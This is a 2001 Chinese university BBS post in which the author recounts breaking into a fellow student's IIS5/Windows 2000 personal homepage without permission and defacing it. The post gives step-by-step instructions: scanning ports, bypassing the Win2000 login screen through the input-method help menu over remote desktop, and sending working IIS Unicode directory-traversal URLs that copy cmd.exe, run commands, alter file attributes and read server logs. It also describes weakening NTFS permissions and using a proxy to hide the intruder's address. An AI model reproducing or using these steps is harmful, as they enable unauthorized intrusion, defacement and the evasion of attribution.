computer 版 (精华区)

发信人: sdrizzle (小雨), 信区: network
标  题: 我的第一次网站攻击。
发信站: 听涛站 (Thu Feb  8 20:07:45 2001), 转信

我是个大菜鸟，也不会什么牛的手段，也不敢找什么大的站点乱试。高手勿看。
于是我就在校内找了个开http服务的站点。
开始：
先扫描用ipscaner一个网段的80端口找到一台victim,是个个人主页。
查到他用的是winNT+IIS5
然后扫描了一遍端口：呵呵，21、23、80、139什么的都开着呢。
哎？等等，怎么3389端口也开着呢？这是win2000的远程共享服务端口。
他大概是装IIS时没动脑子，一古脑全都选上了。
呵呵，这倒简单，直接用win2000客户端连接到他的主机，看到了win2000的登陆界面，

还是advance server呢，就用那个输入法漏洞。
按ctrl+space切换到中文，按shift+ctrl切换到全拼，在工具条上单击右键，选帮助。

在帮助上单击右键，选转到URL，输入c:
呵呵，c盘下一览无余了。inetpub、winnt什么的目录都在。
其实这时候就能修改他的主页了，看着太简单了吧，不过瘾。
于是，我放下这边，决定试一下unicode漏洞。
在IE地址栏里输入：
http://166.111.x.x/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+copy+c:\winn
t\system32\cmd.exe+ccc.exe
其实，不做这一步也行，直接调用cmd.exe，
但这样做了之后，在inetpub\scripts里有个ccc.exe(就是cmd.exe)方便些。省得在日志
里留下一堆..\..
然后输入http://166.111.x.x/scripts/cmd.exe?/+dir+c:\inetpub\wwwroot
呵呵，网页就在这儿呢。下面就可以修改啦！
我是个菜鸟嘛，就随便些两句吧：今天是元宵，就写：
http://166.111.x.x/scripts/cmd.exe?/+echo+祝大家元宵节快乐！+>>+c:\inetpub\w
wwroot\default.htm
唉？faint怎么返回access denied?难道他设成只读了？改一下吧：
http://166.111.x.x/scripts/cmd.exe?/+attrib+c:\inetpub\wwwroot\default.htm+-
r
唉？怎么还不行？
哦！大概他是NTFS，设权限了。
怎么办？只能回到3389上了，连接，c:\inetpub\wwwroot，查看安全，果然：
everyone的权限是只读，呵呵，改成完全不就行了。
（win2000的这个漏洞是不是大的出奇？这是只有administrator才能改的）
然后再回到前面，改主页，一切OK!再浏览，就多了那句话了。
也许你会问，winnt\system32\logfiles\w3svc1里会记下你的IP呀！
你放心，我刚才的过程全都用代理了。不信？查一下：
http://166.111.x.x/scripts/cmd.exe?/+type+c:\winnt\system32\logfiles\w3svc1\
ex010207.log
05:07:45 61.139.x.x GET /scripts/..\../winnt/system32/cmd.exe 200
05:10:46 61.139.x.x GET /scripts/ccc.exe 200
05:10:54 61.139.x.x GET /scripts/ccc.exe 200
05:12:19 61.139.x.x GET /scripts/ccc.exe 502
呵呵，有一堆..\..，不过，IP可不是我的呦。
最后，说两句，上面的一切行为都是学习而已，
我不会做什么破坏系统的事，也不会放木马（其实完全可以做到）
--
hat is love ?
Love means that you don't have to say "sorry",ever.

※ 来源:．听涛站 cces.net．[FROM: 匿名天使的家]